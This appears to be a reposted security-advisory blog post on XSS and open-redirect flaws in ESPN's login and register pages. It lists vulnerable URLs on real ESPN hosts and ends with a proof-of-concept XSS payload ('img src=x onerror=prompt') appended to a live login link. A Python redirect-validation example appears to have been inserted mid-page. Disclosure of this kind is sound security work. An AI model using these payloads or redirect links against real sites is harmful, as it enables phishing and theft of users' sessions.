<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/cnn-cnncom-ads-open-redirect-security.html" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://securityrelated.blogspot.com/2014/12/cnn-cnncom-ads-open-redirect-security.html</a></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 19.6000003814697px; text-align: justify;">These vulnerabilities were reported to CNN in early July through the contact page linked below, but they have still not been patched.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 19.6000003814697px; text-align: justify;"><a href="http://edition.cnn.com/feedback/#cnn_FBKCNN_com" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://edition.cnn.com/feedback/#cnn_FBKCNN_com</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">More Details:</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2014/Dec/128">http://seclists.org/fulldisclosure/2014/Dec/128</a></span></div>
<div style="margin: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2014/12/29/6"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2014/12/29/6</span></a></div>
<div style="margin: 0px;">
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1395"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1395</span></a></div>
<div style="margin: 0px;">
<a href="http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=141988778706126&w=2"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure</span></a></div>
<div style="margin: 0px;">
<a href="http://securitypost.tumblr.com/post/107868680057/ithut-cnn-cnn-com-travel-city-related-links"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securitypost.tumblr.com/post/107868680057/ithut-cnn-cnn-com-travel</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ittechnology.lofter.com/post/1cfbf60d_5500df0">http://ittechnology.lofter.com/post/1cfbf60d_5500df0</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ithut.tumblr.com/post/120833062743/cnn-xss-url-redirection-bug" target="_blank">http://ithut.tumblr.com/post/120833062743/cnn-xss-url-redirection-bug</a></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.tetraph.com/blog/it-news/cnn-xss-url-redirect-bug/">http://www.tetraph.com/blog/it-news/cnn-xss-url-redirect-bug/</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://tetraph.blogspot.com/2015/06/cnn-xss-redirect-bug.html" style="font-family: Arial, Helvetica, sans-serif;">http://tetraph.blogspot.com/2015/06/cnn-xss-redirect-bug.html</a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://biyiniao.wordpress.com/2015/01/08/cnn-xss-open-redirect-bug/" target="_blank">https://biyiniao.wordpress.com/2015/01/08/cnn-xss-open-redirect-bug/</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://whitehatpost.blog.163.com/blog/static/24223205420155613753998/" target="_blank">http://whitehatpost.blog.163.com/blog/static/24223205420155613753998/</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="https://plus.google.com/u/0/+wangfeiblackcookie/posts/bFkukxiUfXK"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://plus.google.com/u/0/+wangfeiblackcookie/posts/bFkukxiUfXK</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/permalink.php?story_fbid=674936469318135&id=594347777377005" target="_blank">https://www.facebook.com/permalink.php?story_fbid=674936469318135</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://diebiyi.com/articles/news/cnn-xss-url-redirect-bug/">http://diebiyi.com/articles/news/cnn-xss-url-redirect-bug/</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://twitter.com/yangziyou/status/607060937309159425">https://twitter.com/yangziyou/status/607060937309159425</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="https://redysnowfox.wordpress.com/2014/12/31/cnn-xss-url-redirect-bug/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://redysnowfox.wordpress.com/2014/12/31/cnn-xss-url-redirect-bug/</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="color: black; font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/permalink.php?story_fbid=1043534509019886&id=922151957824809" target="_blank">https://www.facebook.com/permalink.php?story_fbid=1043534509019886</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://whitehatpost.lofter.com/post/1cc773c8_7338196" style="font-family: Arial, Helvetica, sans-serif;" target="_blank">http://whitehatpost.lofter.com/post/1cc773c8_7338196</a></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/cnn-cnncom-travel-xss-and-ads-open.html">http://securityrelated.blogspot.com/2014/12/cnn-cnncom-travel-xss-and</a></span></div>
</div>
ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege Escalation Web Security Vulnerabilities (published 2015-06-05)<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuYa9hV3KatYUKjHawzyNfywFMP220t68vvrjesDIzBwHCvNETtbJjStSSBmNs-wVwZW6igeziSSViRWE1WyyGbpuR2KUXVZqRrhyNTuP5ZdpDy9hC6ka0HMKUVPnwR6aNoXU8uIXijdI/s1600/espn_games_xss1.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuYa9hV3KatYUKjHawzyNfywFMP220t68vvrjesDIzBwHCvNETtbJjStSSBmNs-wVwZW6igeziSSViRWE1WyyGbpuR2KUXVZqRrhyNTuP5ZdpDy9hC6ka0HMKUVPnwR6aNoXU8uIXijdI/s1600/espn_games_xss1.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege Escalation Web Security Vulnerabilities</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">http://espn.go.com/</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19.7037048339844px;">"ESPN (originally an acronym for Entertainment and Sports Programming Network) is a U.S.-based global cable and satellite television channel that is owned by ESPN Inc., a joint venture between The Walt Disney Company (which operates the network, through its 80% controlling ownership interest) and Hearst Corporation (which holds the remaining 20% interest). The channel focuses on sports-related programming including live and recorded event telecasts, sports news and talk shows, and other original programming.</span></span></div>
<div style="text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19.7037048339844px; text-align: justify;">ESPN broadcasts primarily from studio facilities located in Bristol, Connecticut. The network also operates offices in Miami, New York City, Seattle, Charlotte, and Los Angeles. John Skipper currently serves as president of ESPN, a position he has held since January 1, 2012. While ESPN is one of the most successful sports networks, it has been subject to criticism, which includes accusations of biased coverage, conflict of interest, and controversies with individual broadcasters and analysts. ESPN headquarters in Bristol, Connecticut. As of February 2015, ESPN is available to approximately 94,396,000 paid television households (81.1% of households with at least one television set) in the United States. In addition to the flagship channel and its seven related channels in the United States, ESPN broadcasts in more than 200 countries, operating regional channels in Australia, Brazil, Latin America and the United Kingdom, and owning a 20% interest in The Sports Network (TSN) as well as its five sister networks and NHL Network in Canada.</span><span style="line-height: 19.7037048339844px; text-align: justify;">"(Wikipedia)</span></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability description:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://espn.go.com/" target="_blank">Espn.go.com</a> has web security vulnerabilities: it is vulnerable to XSS (Cross-Site Scripting) and Dest Redirect Privilege Escalation (Open Redirect) attacks.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">These vulnerabilities are particularly dangerous because they occur on ESPN's "login" and "register" pages, which users regard as trustworthy. Attackers can abuse such links to mislead ESPN's users, so the success rate of attacks may be high.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">During the tests, besides the links listed in this advisory, a large number of ESPN's links were found to be vulnerable to these attacks.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The code flaw occurs on "espn.go.com"'s "login" and "register" pages, in the "redirect" (or "appRedirect") parameter, e.g.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://streak.espn.go.com/en/login?redirect=" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://streak.espn.go.com/en/login?redirect=</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://register.go.com/go/sendMemberNames?regFormId=espn&appRedirect=http://register.go.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://register.go.com/go/sendMemberNames?regFormId=espn&appRedirect=http://register.go.com/</span></a></div>
</div>
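The flaw above is a redirect parameter that is honoured without validation. As an added defensive example (not ESPN's code; the allow-listed hosts are constructed for illustration), this is the check a login handler should apply to a "redirect"/"appRedirect" value before issuing the redirect, refusing both external hosts (open redirect) and non-http schemes such as javascript: (the script-execution vector):

```python
"""Allow-list validation for a login page's "redirect" / "appRedirect" value.

Added defensive example; this is not ESPN's code, and the allow-listed hosts
below are constructed for illustration only.
"""
from urllib.parse import urlsplit, urlunsplit

# First-party hosts a login handler may send users back to (constructed list).
ALLOWED_HOSTS = {"espn.go.com", "r.espn.go.com", "games.espn.go.com"}
DEFAULT_TARGET = "/"


def safe_redirect_target(raw, allowed_hosts=ALLOWED_HOSTS, default=DEFAULT_TARGET):
    """Return a redirect target that is safe to place in a Location header.

    Accepted: a same-site path starting with a single "/", or an absolute
    http(s) URL whose host is exactly on the allow-list. Everything else
    (javascript:/data: URLs, protocol-relative //host, backslash variants,
    userinfo tricks such as https://espn.go.com@evil.example, look-alike
    hosts) falls back to `default`.
    """
    if not raw:
        return default
    # Browsers treat "\" as "/" in URLs; normalise so "/\evil" is seen as "//evil".
    candidate = raw.strip().replace("\\", "/")
    # Embedded control characters and whitespace are a classic filter-bypass
    # trick (e.g. "java\tscript:"); refuse rather than try to clean them.
    if any(ord(ch) < 0x21 for ch in candidate):
        return default

    parts = urlsplit(candidate)

    # Case 1: relative target. urlsplit puts "//host" into netloc, so a
    # genuinely local path has neither scheme nor netloc.
    if parts.scheme == "" and parts.netloc == "":
        if candidate.startswith("/") and not candidate.startswith("//"):
            return candidate
        return default

    # Case 2: absolute URL. Only http(s) may ever be redirected to; this is
    # what stops javascript: (script execution) and data: targets.
    if parts.scheme not in ("http", "https"):
        return default
    # Reject userinfo so "https://espn.go.com@evil.example" cannot pass.
    if parts.username is not None or parts.password is not None:
        return default
    try:
        if parts.port is not None:
            return default  # keep redirects on the default port
    except ValueError:
        return default      # malformed port such as ":abc"
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        return default      # exact match only: no suffix/prefix look-alikes
    # Rebuild from parsed parts so the raw string is never echoed verbatim.
    return urlunsplit((parts.scheme, host, parts.path or "/", parts.query, ""))


if __name__ == "__main__":
    # Constructed sample values, mixing legitimate and abusive shapes.
    samples = [
        "/fantasy/football",
        "https://r.espn.go.com/members",
        "javascript:alert(1)",
        "//evil.example/",
        "/\\evil.example",
        "https://espn.go.com@evil.example/",
        "https://espn.go.com.evil.example/",
    ]
    for s in samples:
        print(f"{s!r:40s} -> {safe_redirect_target(s)!r}")
```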
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Tests were performed on Firefox (33.0) in Ubuntu (14.04) and IE (8.0.7601) in Windows 8.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Disclosed by:</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/546910247650996224">@justqdjing</a>)<br /><a href="http://www.tetraph.com/wangjing/" target="_blank">http://www.tetraph.com/wangjing/</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers' right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!" A great many advisories on the following web security issues have been published there: Injection, Broken Authentication and Session Management, Cross-Site Scripting (XSS), Insecure Direct Object References, Security Misconfiguration, Sensitive Data Exposure, Missing Function Level Access Control, Cross-Site Request Forgery (CSRF), Using Components with Known Vulnerabilities, and Unvalidated Redirects and Forwards. It also publishes suggestions, advisories and solution details related to XSS and Open Redirect vulnerabilities, as well as cyber intelligence recommendations.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1) XSS Web Security Vulnerability</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">XSS may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. According to Acunetix, exploited XSS is commonly used to achieve the following malicious results:</span></div>
<div style="margin: 0px;">
<br /></div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Identity theft</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Accessing sensitive or restricted information</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Gaining free access to otherwise paid for content</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Spying on user’s web browsing habits</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Altering browser functionality</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Public defamation of an individual or corporation</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Web application defacement</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Denial of Service attacks</span></li>
</ul>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URLs:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://streak.espn.go.com/en/<wbr></wbr>login?redirect=http%3A%2F%<wbr></wbr>2Fstreak.espn.go.com%2Fen%<wbr></wbr>2FcreateOrUpdateEntrylive%<wbr></wbr>3Fgooglematchup%3Dm32620o35459</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fworld-cup-bracket-linkedin-predictor%2Fvk%2F2014%2Fes%2Fgame%3Famazon%3Dcreate" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://games.espn.go.com/<wbr></wbr>world-cup-bracket-predictor/<wbr></wbr>2014/es/login?redirect=http%<wbr></wbr>3A%2F%2Fgames.espn.go.com%<wbr></wbr>2Fworld-cup-bracket-linkedin-<wbr></wbr>predictor%2Fvk%2F2014%2Fes%<wbr></wbr>2Fgame%3Famazon%3Dcreate</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageNamepaypal%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=reddit" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://r.espn.go.com/members/<wbr></wbr>login?appRedirect=http%3A%2F%<wbr></wbr>2Fr.espn.go.com%2Fgame%<wbr></wbr>3Famazon%3Dcreate%2Fmembers%<wbr></wbr>2FmodifyNewsletters%<wbr></wbr>3FpageNamepaypal%<wbr></wbr>3DESPNNewsletterPage&language=<wbr></wbr>en&affiliateName=espn&<wbr></wbr>regFormId=reddit</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourYahooAccount/login" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://register.go.com/go/<wbr></wbr>sendMemberNames?aff_code=go&<wbr></wbr>appRedirect=http://register.<wbr></wbr>go.com/disney/ebay/<wbr></wbr>GuestServices/<wbr></wbr>YourYahooAccount/login</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2Fyandex%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459" target="_blank">http://streak.espn.go.com/en/<wbr></wbr>login?redirect=http%3A%2F%<wbr></wbr>2Fstreak.espn.go.com%2Fen%<wbr></wbr>2Fyandex%<wbr></wbr>2FcreateOrUpdateEntrylive%<wbr></wbr>3Fgooglematchup%3Dm32620o35459</a>&quot;&gt;&lt;img src=x onerror=prompt('justqdjing')&gt;</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
